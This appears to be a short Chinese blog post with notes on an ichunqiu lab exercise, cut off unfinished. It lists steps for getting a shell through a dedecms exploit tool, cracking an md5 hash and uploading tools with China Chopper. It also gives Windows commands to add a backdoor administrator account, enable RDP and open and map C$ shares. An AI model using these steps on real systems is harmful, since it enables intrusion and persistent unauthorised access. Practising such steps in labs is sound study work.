ichunqiu《真的很简单》实验的几个坑点

用了一下午 做了下这个实验

各种百度无果 作为一枚资深菜鸟 觉得没有一个完整的教程是活不下去的好嘛 .. 被整的死去活来QAQ.


本次实验要求获取www.test.ichunqiu网站的FLAG信息


第一个《我很简单》:参考 独狼的攻略

1.getshell
通过dedecms漏洞利用工具下载 ,链接 tools.ichunqiu.com
之后去掉前3后1 去解md5

  • 2.菜刀上传 pr,cmd,net,net1

  • 3.net user hack 123 /add
    net localgroup administrators hack /add
    3389

  • 4.net user hack //验证是否成功加上

  • 5.in target host>>
    net share ipc$ //打开ipc共享
    net share c$=c: //打开c盘共享

  • 6.in loacl host>>
    net use h: \172.16.12.2\c$ "123" /user:"hack"

    net use 查看连接情况
    net share 查看建立的IPC的连接

ps:时间太紧 明天开课了 作业还没写 先这样 ..

你可能感兴趣的:(ichunqiu《真的很简单》实验的几个坑点)